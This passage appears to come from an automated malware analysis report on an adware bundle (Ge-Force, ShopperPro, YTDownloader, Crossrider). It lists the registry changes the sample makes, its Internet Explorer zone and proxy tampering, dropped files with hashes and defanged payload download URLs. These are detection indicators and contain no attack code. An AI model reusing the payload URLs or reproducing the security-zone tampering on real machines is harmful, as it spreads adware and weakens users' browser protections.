[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"DisplayName" = "Ge-Force"

[HKCU\Software\InstalledBrowserExtensions\21836]
"70881" = "Ge-Force"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Crossrider]
"Verifier" = "67a1823aa892cacdb48c5c33d8b81ea2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"CrAppId" = "70881"
"DisplayVersion" = "1.36.01.22"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"CrPublisherId" = "21836"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\InstalledBrowserExtensions\Webar]
"70881" = "Ge-Force"

[HKLM\SOFTWARE\Crossrider]
"Bic" = "03a471124f01b8b4a21fa91e866e62edIE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"DisplayIcon" = "%Program Files%\Ge-Force\utils.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Crossrider]
"Bic" = "03a471124f01b8b4a21fa91e866e62edIE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 2F D5 8F EC C0 90 6A 6D A0 8D 91 96 2C A6 D4"

[HKLM\SOFTWARE\Crossrider]
"Verifier" = "67a1823aa892cacdb48c5c33d8b81ea2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21836]
"70881" = "Ge-Force"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"Publisher" = "Webar"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Tempo]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5	File path
c5d47c22c4033b31e1dcc30474e71099	c:\Documents and Settings\All Users\Application Data\ShopperPro\ShopperPro.dll
23c6c404ae0bb395c9fd35435a8c0e89	c:\Documents and Settings\All Users\Application Data\ShopperPro\ShopperPro64.dll
05c47da12b0009bd98653f51287f7768	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_26625\bxsdk32.dll
c3cc98ea0f315f6f0cef1e8b4cde8cec	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_26625\ins_geforce.exe
45d24661f09446e1e3009a5a8570804e	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_26625\ins_sense.exe
4725e0005d5764ca825a7394d1d4a9aa	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_26625\ins_shopperpro.exe
4896a79dc5d7d13664d44323a0347a75	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa6.tmp\AccDownload.dll
faa7f034b38e729a983965c04cc70fc1	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa6.tmp\nsProcess.dll
bf2aaf49de76271597457a231e14a0d1	c:\Program Files\Common Files\System\SysMenu.dll
02e015706e6d74e7c8e9a1a281552082	c:\Program Files\Ge-Force\55db0f44-c101-47cd-8ede-099d17d7ae11-5.exe
92e1ef2cc540f94f364225074cf1014f	c:\Program Files\Ge-Force\Uninstall.exe
eb0037c52b7797f74980add22453d12f	c:\Program Files\Ge-Force\utils.exe
c10bd93733cd121ac8985142713b027f	c:\Program Files\Sense\88328397-9b53-4507-979d-3bf6c5e6551d-5.exe
3e491e341d63f11b1dc8785b2c77563d	c:\Program Files\Sense\Uninstall.exe
192cfffa8c73345c84e57c05c33c0411	c:\Program Files\Sense\utils.exe
3d242e1e6b2bfc6196329d65ca2e9459	c:\Program Files\ShopperPro\JSDriver\jsdrv.exe
ef3beabbe131b16998a6bc2c16d32804	c:\Program Files\ShopperPro\JSDriver\jsdrv.sys
b90f8955cfb6fdc680a0f94c7b431518	c:\Program Files\ShopperPro\SPRemove.exe
c5d47c22c4033b31e1dcc30474e71099	c:\Program Files\ShopperPro\ShopperPro.dll
18861609d2118f5ff6e35afe32f24680	c:\Program Files\ShopperPro\ShopperPro.exe
23c6c404ae0bb395c9fd35435a8c0e89	c:\Program Files\ShopperPro\ShopperPro64.dll
9e3d281cdbad436fdcaed746c6dfe009	c:\Program Files\ShopperPro\Updater.exe
45960b40c1ecb75ed5549a80049879e1	c:\Program Files\YTDownloader\AniGIF.ocx
3642f232c3738837372ac57a094cf868	c:\Program Files\YTDownloader\BrowserHelper.exe
ebc84edd16209175901c2dd98c7254a8	c:\Program Files\YTDownloader\BrowserHelperSrv.exe
3ce140ec43fc717c89a1bcbfe8b306d8	c:\Program Files\YTDownloader\DownloadAPI.dll
975ba8ad4456c5a117baf935c8e464c2	c:\Program Files\YTDownloader\DownloadHelper.exe
5d47c26721bac5ff1dc1475d7b3c6107	c:\Program Files\YTDownloader\Unelevate.exe
210ac850b441030a6c5c7a9e6b921b27	c:\Program Files\YTDownloader\Updater.exe
99fee9709c4da6be640982b1639958a9	c:\Program Files\YTDownloader\YTDUninstall.exe
2ef101c49d4b7c10405fd4fbb4be25b7	c:\Program Files\YTDownloader\YTDownloader.exe
413c7f00b3c2fc55de0ed5d2773068a7	c:\Program Files\YTDownloader\converter.exe
fbb160d9fc7ba584b627e0267d0b8043	c:\Program Files\YTDownloader\libeay32.dll
e519f2bf8d35627aa8c712aa636f52ff	c:\Program Files\YTDownloader\rtmpdump.exe
1e18bb58bcbaeef7c52ae2f3faa0fcca	c:\Program Files\YTDownloader\sbmntr.sys
c0ca162d62aedd6e7d179ed6bc6c102e	c:\Program Files\YTDownloader\ssleay32.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version: 2.7.0.999
Legal Copyright: Copyright (C) 2014
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.7.0.999
File Description:
Comments:
Language: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	869151	869376	4.35096	381bcea515764f8e620d5b1de029d38d
.rdata	876544	259748	260096	3.00521	9f2f060a4acc0686a00468d78cab116d
.data	1138688	25064	12800	3.17753	156a6872d161433de48af98dc5f1510a
.rsrc	1167360	244152	244224	4.40217	ba6ea39d8648d37a8c3262102d014a56
.reloc	1413120	42900	43008	4.58903	ac4358dd13d97893a2fa6c5bfb139db2

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
ddc0733b3f765c1db2c51e1493118a2e

URLs

URL	IP
hxxp://d2bt1dcmxj05l2.cloudfront.net/ShopperProJSFull.exe	54.192.98.184
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/t.ashx?e=c2mW1WEUbCGchLpJKTn3oA95M8AGEQczaMzgTHP7UuxxTYwWxYG9WJimSgauFBdeEsZQDBxy5lq85Eily66X40CN9h bV19VSl3u293svNWe4QpoO1WcaCmF904v4t2DhvUiLCZht1Hw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q==	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=lOCrbsNL2zX5PxLbQh95wAXvthyJPaJKd67ZOkkzliGAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyX4qqsNyMBXLhKjg3QPK9RUYoPmCilwQzpEygzZ5HCHBgq eNMUDOF8WMvpiqiAuLauY01Zje2rmTRcHKuVeTpZhKEBix7LJLFAL52sIXt4XyrUF6vpeaSi3QPqxzrS768NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWMuZ39ZKmX8t2bplv9TGk1fDKq1cBMWuAUaWt9LKpyI/w==	198.232.124.192
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=KSz5qzb2KgILjT49fHfOTDBwG1YwlthhjvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YF229d2NmJyH8u4UiaOpW ekvOVFChYf3tHwF8xC533Fc3O89Ayj8kQ5nRWn512cGwglp5Ou0Lqzgj0N7bp/0QtT y763yGA6RxIVIuR6gY90KYX3Ti/i3YN0GnS/sqLaXNze4rve4B55uvWdXKWPWX1kMzPImJ YKQ/uH3D47U2jKamhHMPzfxpxB8EIjfiACImkToQE5nQmkotB9RW/6plxCTif7 HRCMYiUiMRX0MJaDoVDw5BvIl1Sxk9dVF2Un7eh3YR5TKW9RBaCNc3es0VCnZ5DcmuLPa2zo6u4b7D8bdezUh106WEGdurigby3ccGgkrIt9Sz6uFAVSZOYQaNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVKkFGG1oMncRKXddqDrNTpxqumDABcVlA	198.232.124.192
hxxp://dyd9qf154h76q.cloudfront.net/bxsdk32.dll	54.230.98.183
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=KSz5qzb2KgILjT49fHfOTDBwG1YwlthhjvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YF229d2NmJyH8u4UiaOpW ekvOVFChYf3tHwF8xC533Fc3O89Ayj8kQ5nRWn512cGwglp5Ou0Lqzgj0N7bp/0QtT gjKfKdz3qVWyif 2VH4gkOB3v7aTq0EAO1UoOX/Vu1O8xmMRVWZOb7j5JAyiJ5DwvGnwcuiCjBHn3WtPO7TkPk55LBQN29raE2JuypHmFWVSvOHNjNGn9Ml1CWbMzqGGIJKr1apPDjX11Os5aVVaMSW7JRyrSLU=	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=KSz5qzb2KgILjT49fHfOTDBwG1YwlthhjvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YF229d2NmJyH8u4UiaOpW ekvOVFChYf3tHwF8xC533Fc3O89Ayj8kQ5nRWn512cGwglp5Ou0Lqzgj0N7bp/0QtQffnfHIkhvoI4G r 3F6T7omWQCs2KHYpWmYrStiETeA1nEPCPm/IBivhsXSOs3rXE0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9KyX4qqsNyMBXLhKjg3QPK9Rah4lxHBW/CZ	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=LCnUzM5l8JKBkxMrsxJdJscrIdqQqjphli9tWrA6KPI2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3SXxmarrZLBmoGtPoa5D1iOcnF290GY/Hng fWZsLDRwOWufSVBCsQTuVqOEbeDQPHiyoaNv5jwY74r1XQZFERLoBlFznl6CF8XIwY4UXEFgs IILilpWF0klpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGKC0927cjGq3hLh0VTpm3sSDcVTtmyTzBnyucPTMPOBI=	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/YTDownloaderFull.exe	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=Feo0TQZfu6ILjT49fHfOTDBwG1YwlthhjvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YF229d2NmJyH8u4UiaOpW ekvOVFChYf3tHwF8xC533Fc3O89Ayj8kQ5nRWn512cGwglp5Ou0Lqzgj0N7bp/0QtT6UR/N6r03qZR90anDedSCtJwJAW8Acv9 CRTrfRId1tm02TdpGphdwFtI2K6z27MH0y7l iyb2lolT9Z5SB8RR4QoTwFS7WyM30dS3vvSrcn9NOrToB344c4rzOrHwYiNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVKkFGG1oMncRKXddqDrNTpxqumDABcVlA	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=aQQpsP6/AW18o9SV8EJ33bc6SIxRQRtBUbUtEnNSeXsoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU450z1I49BqHHs6NZFD4Ir5RXZw XidYyOqT8hXp 3YGKZG16Dbbuw50u5/ xwfuCdwCrDirBT3MBNgKkdlz1lRoRNUM0FVgKbyMTNAagX5zbhadmUyQT5xNbOt/W9fkCR9JJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRigtPdu3Ixqt4S4dFU6Zt7Eg3FU7Zsk8wZ8rnD0zDzgS	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=aQQpsP6/AW18o9SV8EJ33bc6SIxRQRtBUbUtEnNSeXsoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU450z1I49BqHHs6NZFD4Ir5RXZw XidYyOqT8hXp 3YGKZG16Dbbuw50u5/ xwfuCdwCrDirBT3MBNgKkdlz1lRoX4r3S9aDbaOBPEhRyyBD7D0lOwqSwnORz0Z05yANjzcUdHLbi5Fo13kPWZgf7JA3i5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjnTPUjj0Gocezo1kUPgivlF3/uS0BoaQ4k=	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=aQQpsP6/AW18o9SV8EJ33bc6SIxRQRtBUbUtEnNSeXsoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU450z1I49BqHHs6NZFD4Ir5RXZw XidYyOqT8hXp 3YGKZG16Dbbuw50u5/ xwfuCdwCrDirBT3MBNgKkdlz1lRoRQC4gKM3p050JQd5HxgIXdsn45NULvy1Tc6i7r/RwOX4hMYvtqILweTZ3JhHXtVg4LlYGh62K7VQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiY5ZMFGhcknP srAPq35vVlHiPVU04Syd0l8Zmq62SwZqBrT6GuQ9YjnJxdvdBmPx5So7uTg9qUVw==	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=xY8ohDYpM j7QFMK1iR6lt98eXkGB3DtoOZ8Vy4PwRBA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFYy5nf1kqZfy3ZumW/1MaTV8MqrVwExa4BSW9FdIdPM4WJ0gxPZGJkwMj0/D5C5pj63XZajHTLi98Lhu0b45kiT/GBdpOSxhWVkVmCwhd6chxgZiB55ZFi63q4y 8yJTFvYqYyeeQ3tOzU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0af0yXUJZszOoYYgkqvVqk8ONfXU6zlpVVoxJbslHKtItQ==	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=xY8ohDYpM j7QFMK1iR6lt98eXkGB3DtoOZ8Vy4PwRBA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFYy5nf1kqZfy3ZumW/1MaTV8MqrVwExa4BSW9FdIdPM4WJ0gxPZGJkwMj0/D5C5pj63XZajHTLi98Lhu0b45kiT/aaY YTEt5UpR90anDedSCGzyp8r50/oAU8yRr4Ty3tIPlhjIQTrv xNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsl KqrDcjAVy4So4N0DyvUWoeJcRwVvwmQ==	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=xY8ohDYpM j7QFMK1iR6lt98eXkGB3DtoOZ8Vy4PwRBA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFYy5nf1kqZfy3ZumW/1MaTV8MqrVwExa4BSW9FdIdPM4WJ0gxPZGJkwMj0/D5C5pj63XZajHTLi98Lhu0b45kiT91Q6BhL4ofYRQC drCF7eFryGSAYUmLPzFKzsac0RwM cz2GPqbyVJU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0af0yXUJZszOoYYgkqvVqk8ONfXU6zlpVVoxJbslHKtItQ==	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=xY8ohDYpM j7QFMK1iR6lt98eXkGB3DtoOZ8Vy4PwRBA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFYy5nf1kqZfy3ZumW/1MaTV8MqrVwExa4BSW9FdIdPM4WJ0gxPZGJkwMj0/D5C5pj63XZajHTLi98Lhu0b45kiT94pHMK6k0QKwTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU450z1I49BqHHs6NZFD4Ir5Rd/7ktAaGkOJ	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=aQQpsP6/AW18o9SV8EJ33bc6SIxRQRtBUbUtEnNSeXsoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU450z1I49BqHHs6NZFD4Ir5RXZw XidYyOqT8hXp 3YGKZG16Dbbuw50u5/ xwfuCdwCrDirBT3MBNgKkdlz1lRoauGBKhpkBj 1FnN G3tSlj0Dx2m 0F47aFzcNuM2tbw FqU0ZF4YO51d/yz32tmquaHkbuQuAqpFpXrulLecGSS4ZuIyp4CyK1/ 6fzDi2txNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsl KqrDcjAVy4So4N0DyvUWoeJcRwVvwmQ==	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=aQQpsP6/AW18o9SV8EJ33bc6SIxRQRtBUbUtEnNSeXsoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU450z1I49BqHHs6NZFD4Ir5RXZw XidYyOqT8hXp 3YGKZG16Dbbuw50u5/ xwfuCdwCrDirBT3MBNgKkdlz1lRocgRgxetMCtyAhwsRGINruhH49K9bqCBjptTvQuQU86CVO2qWyDxTHBfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUu51CUbXbhryEU5MDCXDxgXbb13Y2YnIfy7hSJo6lb56S85UUKFh/e0	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=c2mW1WEUbCGchLpJKTn3oA95M8AGEQczaMzgTHP7UuxxTYwWxYG9WJimSgauFBdeEsZQDBxy5lq85Eily66X40CN9h bV19V1Gg4F6dkBzXUfBgwh1qVrevysBL0IwHwhEolvsKoHiSTZUc6Aooj3S5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcboqKFmkaACc=	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=c2mW1WEUbCGchLpJKTn3oA95M8AGEQczaMzgTHP7UuxxTYwWxYG9WJimSgauFBdeEsZQDBxy5lq85Eily66X40CN9h bV19V1Gg4F6dkBzXUfBgwh1qVrROUvSdX2iqnJyMz45O1xrVtQeXCcg/Fhy2/UUM264sa8NVcbx dWxSReJECB10wJoxWgtYjek0x0XbBjJK/aOU=	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=lOCrbsNL2zX5PxLbQh95wAXvthyJPaJKd67ZOkkzliGAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyX4qqsNyMBXLhKjg3QPK9RUYoPmCilwQzpEygzZ5HCHBgq eNMUDOF8WMvpiqiAuLauY01Zje2rnEEASnTAt8o5accpdDgHJP0JQd5HxgIXdwgIjv 1CV6Nl6iMSCUoXjJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRigtPdu3Ixqt4S4dFU6Zt7Eg3FU7Zsk8wZ8rnD0zDzgS	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=M7A8vgjJHrjHEQ/kk/2L9gXvthyJPaJKd67ZOkkzliGAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyX4qqsNyMBXLhKjg3QPK9RUYoPmCilwQzpEygzZ5HCHBgq eNMUDOF8WMvpiqiAuLauY01Zje2rmdskpjA9 6EJZxK5xGkdrnFAL52sIXt4VzrzFC04 gV5lncX3mCzqcRV2NtvBCcfJW0Hx6tEFQQ1 Ueo5mw0 RJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRigtPdu3Ixqt4S4dFU6Zt7Eg3FU7Zsk8wZ8rnD0zDzgS	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=1ZEnpGuz/IS8qFEAMB5m azLlpTYamnBnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRigtPdu3Ixqt4S4dFU6Zt7Eg3FU7Zsk8wYZf1LqK7dF9Tc/ TiC/QQMa8vvz4viJlsTo2d4WqtMZ333RAvM0VMA8vsH YHvRtveyr8vVjKUos IILilpWF0OiEhuPxDpVrvBOGo5I8L8Nh3QJEALW3TwZ3PcSIlH9s8cAK9 rs6AU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0af0yXUJZszOoYYgkqvVqk8ONfXU6zlpVVoxJbslHKtItQ==	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=M7A8vgjJHrgnU0zGYqnF7YCqKDcj8uMnImHa5 zuJP9XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp/TJdQlmzM6hhiCSq9WqTw419dTrOWlVWhje9aYYjnGxmKZKBq4UF14SxlAMHHLmWrzkSKXLrpfjUu2F7cTkckXysGpf6P3fSEGTHC6fNrU58xq68k2LWb/g8qOxlG0IsLhsrgWaAFgzk2HxL2Lh3QfpBRneI3nfw8hUJxFglofBqp9Xc7DttahTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRp/TJdQlmzM6hhiCSq9WqTw419dTrOWlVWjEluyUcq0i1	198.232.124.192
hxxp://p2sds6-zxis6jz8.netdna-ssl.com/21405.ashx?e=XOxRKBm2zlzeGR5RbVJEg7c6SIxRQRtBOtXSl8 CxaEoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU450z1I49BqHHs6NZFD4Ir5RXZw XidYyOqT8hXp 3YGKZG16Dbbuw50u5/ xwfuCdwn i/Vk2zUNtgKkdlz1lRoQ919p7AKUpMEwAaRG2pHiUVqC1aQjPYhDVQk8gY3vhjwXZuQM0I7 mdLIaqTW0yuBrd23Bi/YO5kgj0wc9eDMUnCmQO3a9dMJOXaRLeTy 6CAOOMT3NqqKL8oDrVP/cKI4034t1Q4pu3fndBZnH/Wk11N66AH6x9ECOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndJfGZqutksGaga0 hrkPWI5ycXb3QZj8eUqO7k4PalFc=	198.232.124.192
hxxp://rep.shopper-pro.com/app/ping.ashx?e=s5Ydxb c7o0asVMAMALcPLc6SIxRQRtBG/ZUeQvWZPLZhN5o5pkk8XKxIhAz9YyqGyBmbznVabtjitbG0au4saKJheTo7D0U9FnDJdHDIe4mXBKEh8LlY7UnxYNsjbNdZx5NR gPs KmytkOxhhp1gslC5aviQJWemyrrtcHnO0ys89o9QykRC5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAc/1td01976VC51CUbXbhryEU5MDCXDxgXbb13Y2YnIfy7hSJo6lb56S85UUKFh/e0AUq9vGFcnz6oiz5XsOzoJG5lkiLn 2iON4UrLMQQDZPMFopdoQp3MXCrArhn8sH AS7DCm3ZJZeNpBJRUpe7bX0UJxZodl69	54.197.238.106
